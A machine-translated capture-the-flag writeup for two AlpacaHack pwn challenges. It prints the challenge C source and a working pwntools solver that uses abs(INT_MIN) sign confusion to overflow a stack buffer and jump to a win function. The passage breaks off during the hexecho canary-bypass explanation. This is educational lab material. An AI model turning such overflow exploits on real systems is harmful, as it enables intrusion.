{"componentChunkName":"component---src-templates-post-template-js","path":"/ctf-alpaca-round1-pwn-en","result":{"data":{"markdownRemark":{"id":"fad0b992-f3d9-5466-8307-3c027d154408","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/ctf-alpaca-round1-pwn\">original page</a>.</p>\n</blockquote>\n<p>I finally wrote the long-postponed writeup for AlpacaHack Round 1 (Pwn).</p>\n<p>I ran out of energy, so I will cover the remaining two challenges another time.</p>\n<p>Reference: <a href=\"https://alpacahack.com/ctfs/round-1/challenges\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Challenges - AlpacaHack Round 1 (Pwn)</a></p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#echopwn\">echo(Pwn)</a></li>\n<li>\n<p><a href=\"#hexechopwn\">hexecho(Pwn)</a></p>\n<ul>\n<li><a href=\"#scanf-specifications-and-how-to-exploit-them\">scanf Specifications and How to Exploit Them</a></li>\n<li><a href=\"#bypassing-the-canary\">Bypassing the Canary</a></li>\n<li><a href=\"#leaking-libc\">Leaking libc</a></li>\n<li><a href=\"#exploit\">Exploit</a></li>\n</ul>\n</li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"echopwn\" style=\"position:relative;\"><a href=\"#echopwn\" aria-label=\"echopwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>echo(Pwn)</h2>\n<blockquote>\n<p>A service for reachability check.</p>\n</blockquote>\n<p>The challenge provided C source code and an executable binary.</p>\n<p>First, I checked the binary’s protection mechanisms.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 665px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/3f198929963501550d07e2ee2f8afa90/5f4af/image-20240818120620924.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 20.833333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAqklEQVQY05WN2w6CMBBEt7QYMXgBiRChpS1y1cj/f9244oOJPhgfTmYz2Zmhk0lR2ATdrFF3ObTXsO2EuunRjDOMb+HaAfbSv2/mqc47aFMh3sYLURSBBAXwroE1DsT30Fa4DRW8yXAfCxzTHQJBCJVEGEooFUDJF1JKztAH/DxdR1hXL4beE/yBYFhtTNh/BX4ghEBZnnlZLUayFkg3hIzLch4r2Fv9UfgAjYlcM67eDTAAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/3f198929963501550d07e2ee2f8afa90/8ac56/image-20240818120620924.webp 240w,\n/static/3f198929963501550d07e2ee2f8afa90/d3be9/image-20240818120620924.webp 480w,\n/static/3f198929963501550d07e2ee2f8afa90/ced6d/image-20240818120620924.webp 665w\"\n              sizes=\"(max-width: 665px) 100vw, 665px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/3f198929963501550d07e2ee2f8afa90/8ff5a/image-20240818120620924.png 240w,\n/static/3f198929963501550d07e2ee2f8afa90/e85cb/image-20240818120620924.png 480w,\n/static/3f198929963501550d07e2ee2f8afa90/5f4af/image-20240818120620924.png 665w\"\n            sizes=\"(max-width: 665px) 100vw, 665px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/3f198929963501550d07e2ee2f8afa90/5f4af/image-20240818120620924.png\"\n            alt=\"image-20240818120620924\"\n            title=\"image-20240818120620924\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Next, I looked at the provided source code.</p>\n<p>Since PIE is disabled, it looks like a simple buffer overflow into the <code class=\"language-text\">win</code> function should give the flag, but the <code class=\"language-text\">get_size</code> function validates the input size, so the overflow cannot be exploited so easily.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdio.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdlib.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;unistd.h></span></span>\n\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">define</span> <span class=\"token macro-name\">BUF_SIZE</span> <span class=\"token expression\"><span class=\"token number\">0x100</span></span></span>\n\n<span class=\"token comment\">/* Call this function! */</span>\n<span class=\"token keyword\">void</span> <span class=\"token function\">win</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>args<span class=\"token punctuation\">[</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span><span class=\"token string\">\"/bin/cat\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"/flag.txt\"</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">}</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">execve</span><span class=\"token punctuation\">(</span>args<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> args<span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">exit</span><span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">int</span> <span class=\"token function\">get_size</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token comment\">// Input size</span>\n  <span class=\"token keyword\">int</span> size <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">scanf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"%d%*c\"</span><span class=\"token punctuation\">,</span> <span class=\"token operator\">&amp;</span>size<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n  <span class=\"token comment\">// Validate size</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>size <span class=\"token operator\">=</span> <span class=\"token function\">abs</span><span class=\"token punctuation\">(</span>size<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">></span> BUF_SIZE<span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">puts</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[-] Invalid size\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">exit</span><span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n\n  <span class=\"token keyword\">return</span> size<span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">void</span> <span class=\"token function\">get_data</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>buf<span class=\"token punctuation\">,</span> <span class=\"token keyword\">unsigned</span> size<span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">unsigned</span> i<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">char</span> c<span class=\"token punctuation\">;</span>\n\n  <span class=\"token comment\">// Input data until newline</span>\n  <span class=\"token keyword\">for</span> <span class=\"token punctuation\">(</span>i <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span> i <span class=\"token operator\">&lt;</span> size<span class=\"token punctuation\">;</span> i<span class=\"token operator\">++</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">fread</span><span class=\"token punctuation\">(</span><span class=\"token operator\">&amp;</span>c<span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">stdin</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">!=</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">break</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>c <span class=\"token operator\">==</span> <span class=\"token char\">'\\n'</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">break</span><span class=\"token punctuation\">;</span>\n    buf<span class=\"token punctuation\">[</span>i<span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> c<span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  buf<span class=\"token punctuation\">[</span>i<span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token char\">'\\0'</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">void</span> <span class=\"token function\">echo</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">int</span> size<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">char</span> buf<span class=\"token punctuation\">[</span>BUF_SIZE<span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n\n  <span class=\"token comment\">// Input size</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Size: \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  size <span class=\"token operator\">=</span> <span class=\"token function\">get_size</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n  <span class=\"token comment\">// Input data</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Data: \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">get_data</span><span class=\"token punctuation\">(</span>buf<span class=\"token punctuation\">,</span> size<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n  <span class=\"token comment\">// Show data</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Received: %s\\n\"</span><span class=\"token punctuation\">,</span> buf<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">int</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token function\">setbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdin</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">setbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdout</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">echo</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">return</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>While looking for a way to bypass the <code class=\"language-text\">abs</code> call in <code class=\"language-text\">get_size</code>, I found that, as shown below, it cannot correctly compute the absolute value when given signed <code class=\"language-text\">INT_MIN</code>.</p>\n<p>Reference: <a href=\"https://stackoverflow.com/questions/11243014/why-is-absint-min-still-2147483648\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">c - Why is abs(INT_MIN) still -2147483648? - Stack Overflow</a></p>\n<p>In <code class=\"language-text\">get_data</code>, however, the size is treated as an unsigned int rather than an int, so by supplying signed <code class=\"language-text\">INT_MIN</code> (<code class=\"language-text\">-2147483648</code>) as input, it becomes possible to push more than 0x100 bytes of data onto the stack.</p>\n<p>I ultimately obtained the flag with the following solver.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\ncontext<span class=\"token punctuation\">.</span>arch <span class=\"token operator\">=</span> <span class=\"token string\">\"amd64\"</span>\ncontext<span class=\"token punctuation\">.</span>endian <span class=\"token operator\">=</span> <span class=\"token string\">\"little\"</span>\n\n<span class=\"token comment\"># Set target</span>\nTARGET_PATH <span class=\"token operator\">=</span> <span class=\"token string\">\"./echo\"</span>\nexe <span class=\"token operator\">=</span> ELF<span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">)</span>\n\ntarget <span class=\"token operator\">=</span> remote<span class=\"token punctuation\">(</span><span class=\"token string\">\"34.170.146.252\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">17360</span><span class=\"token punctuation\">,</span> ssl<span class=\"token operator\">=</span><span class=\"token boolean\">False</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Exploit</span>\n<span class=\"token comment\"># https://stackoverflow.com/questions/11243014/why-is-absint-min-still-2147483648</span>\ntarget<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"Size: \"</span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b\"-2147483648\"</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\ntarget<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"Data: \"</span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">=</span> flat<span class=\"token punctuation\">(</span>\n    <span class=\"token string\">b\"A\"</span><span class=\"token operator\">*</span><span class=\"token number\">0x110</span><span class=\"token punctuation\">,</span>\n    <span class=\"token string\">b\"B\"</span><span class=\"token operator\">*</span><span class=\"token number\">8</span><span class=\"token punctuation\">,</span>\n    <span class=\"token number\">0x4011f6</span>\n<span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Finish exploit</span>\ntarget<span class=\"token punctuation\">.</span>interactive<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>clean<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>This confirmed that the correct flag was <code class=\"language-text\">Alpaca{s1Gn3d_4Nd_uNs1gn3d_s1zEs_c4n_cAu5e_s3ri0us_buGz}</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/c3be38ab21caf369ac0f891ba3056a46/d004c/image-20240818132225642.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 17.5%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAh0lEQVQY05XPyQrCMBAG4HiaLB7SJTvYJgUVpe37P92vjeJBUPTw8c/CHIblEnE8TbAhoXfxKaDrO6i9AhGBMfa7lhgOagf5z9E3yzpjXWZcL2eUqSDnseYwDvDBP/g3deYQY6hpjIGxBtZZsJQiwn3RtA201iBO9c0tueCfcQ4pJYQQr36rb+iMW5i5mqqxAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/c3be38ab21caf369ac0f891ba3056a46/8ac56/image-20240818132225642.webp 240w,\n/static/c3be38ab21caf369ac0f891ba3056a46/d3be9/image-20240818132225642.webp 480w,\n/static/c3be38ab21caf369ac0f891ba3056a46/e46b2/image-20240818132225642.webp 960w,\n/static/c3be38ab21caf369ac0f891ba3056a46/f992d/image-20240818132225642.webp 1440w,\n/static/c3be38ab21caf369ac0f891ba3056a46/6eb7d/image-20240818132225642.webp 1611w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/c3be38ab21caf369ac0f891ba3056a46/8ff5a/image-20240818132225642.png 240w,\n/static/c3be38ab21caf369ac0f891ba3056a46/e85cb/image-20240818132225642.png 480w,\n/static/c3be38ab21caf369ac0f891ba3056a46/d9199/image-20240818132225642.png 960w,\n/static/c3be38ab21caf369ac0f891ba3056a46/07a9c/image-20240818132225642.png 1440w,\n/static/c3be38ab21caf369ac0f891ba3056a46/d004c/image-20240818132225642.png 1611w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/c3be38ab21caf369ac0f891ba3056a46/d9199/image-20240818132225642.png\"\n            alt=\"image-20240818132225642\"\n            title=\"image-20240818132225642\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"hexechopwn\" style=\"position:relative;\"><a href=\"#hexechopwn\" aria-label=\"hexechopwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>hexecho(Pwn)</h2>\n<blockquote>\n<p>Stack canary makes me feel more secure.</p>\n</blockquote>\n<p>As in the previous challenge, an executable binary and source code were provided.</p>\n<p>This time, however, stack canaries appear to be enabled in the binary.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 778px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/87d9b2e3ffa16c64c515da7829efb0fa/20982/image-20240818133017795.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 18.75%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAArUlEQVQY042M2w6CMBBEVzDa4o0UoV4QSgURjf//eceqD8b4oA8nOzuzs1L2Kc2toB5y7L6k6q5U7ZVd3eK6C6XvORzP1EE/eOhXNuCahv58wm4sWWbI8zXiG0+RW1aLBbfB07odQ1fiKkuiNVpNmc8SkkSHXT2nCp4OWqkXIvLm1HcYY5BYKNyIdCtkByHW8nn4L8fWE8VjJuHhZilszYj9TKhDuPxRjqLoy7sDSpZdBpMu9XgAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/87d9b2e3ffa16c64c515da7829efb0fa/8ac56/image-20240818133017795.webp 240w,\n/static/87d9b2e3ffa16c64c515da7829efb0fa/d3be9/image-20240818133017795.webp 480w,\n/static/87d9b2e3ffa16c64c515da7829efb0fa/10884/image-20240818133017795.webp 778w\"\n              sizes=\"(max-width: 778px) 100vw, 778px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/87d9b2e3ffa16c64c515da7829efb0fa/8ff5a/image-20240818133017795.png 240w,\n/static/87d9b2e3ffa16c64c515da7829efb0fa/e85cb/image-20240818133017795.png 480w,\n/static/87d9b2e3ffa16c64c515da7829efb0fa/20982/image-20240818133017795.png 778w\"\n            sizes=\"(max-width: 778px) 100vw, 778px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/87d9b2e3ffa16c64c515da7829efb0fa/20982/image-20240818133017795.png\"\n            alt=\"image-20240818133017795\"\n            title=\"image-20240818133017795\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>To solve the challenge, I examined the following source code.</p>\n<p>It is not very different from the previous challenge, but the size validation has been removed and the input is read in hexadecimal.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdio.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdlib.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;unistd.h></span></span>\n\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">define</span> <span class=\"token macro-name\">BUF_SIZE</span> <span class=\"token expression\"><span class=\"token number\">0x100</span></span></span>\n\n<span class=\"token keyword\">int</span> <span class=\"token function\">get_size</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">int</span> size <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">scanf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"%d%*c\"</span><span class=\"token punctuation\">,</span> <span class=\"token operator\">&amp;</span>size<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">return</span> size<span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">void</span> <span class=\"token function\">get_hex</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>buf<span class=\"token punctuation\">,</span> <span class=\"token keyword\">unsigned</span> size<span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">for</span> <span class=\"token punctuation\">(</span><span class=\"token keyword\">unsigned</span> i <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span> i <span class=\"token operator\">&lt;</span> size<span class=\"token punctuation\">;</span> i<span class=\"token operator\">++</span><span class=\"token punctuation\">)</span>\n    <span class=\"token function\">scanf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"%02hhx\"</span><span class=\"token punctuation\">,</span> buf <span class=\"token operator\">+</span> i<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">void</span> <span class=\"token function\">hexecho</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">int</span> size<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">char</span> buf<span class=\"token punctuation\">[</span>BUF_SIZE<span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n\n  <span class=\"token comment\">// Input size</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Size: \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  size <span class=\"token operator\">=</span> <span class=\"token function\">get_size</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n  <span class=\"token comment\">// Input data</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Data (hex): \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">get_hex</span><span class=\"token punctuation\">(</span>buf<span class=\"token punctuation\">,</span> size<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n  <span class=\"token comment\">// Show data</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Received: \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">for</span> <span class=\"token punctuation\">(</span><span class=\"token keyword\">int</span> i <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span> i <span class=\"token operator\">&lt;</span> size<span class=\"token punctuation\">;</span> i<span class=\"token operator\">++</span><span class=\"token punctuation\">)</span>\n    <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"%02hhx \"</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">(</span><span class=\"token keyword\">unsigned</span> <span class=\"token keyword\">char</span><span class=\"token punctuation\">)</span>buf<span class=\"token punctuation\">[</span>i<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">putchar</span><span class=\"token punctuation\">(</span><span class=\"token char\">'\\n'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">int</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token function\">setbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdin</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">setbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdout</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">hexecho</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">return</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>Since there is no size validation, exploiting the buffer overflow itself is easy, but we still need to bypass the canary.</p>\n<p>At first, however, I could not find a way to exploit the buffer overflow without either leaking or corrupting the canary.</p>\n<p>Reading the official writeup, I learned that the key point is that the return value of <code class=\"language-text\">scanf(\"%02hhx\", buf + i);</code> is never checked.</p>\n<p>Reference: <a href=\"https://ptr-yudai.hatenablog.com/entry/2024/08/19/035647\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Writeup for AlpacaHack Round 1 (Pwn) - Let’s Do CTF</a></p>\n<h3 id=\"scanf-specifications-and-how-to-exploit-them\" style=\"position:relative;\"><a href=\"#scanf-specifications-and-how-to-exploit-them\" aria-label=\"scanf specifications and how to exploit them permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path 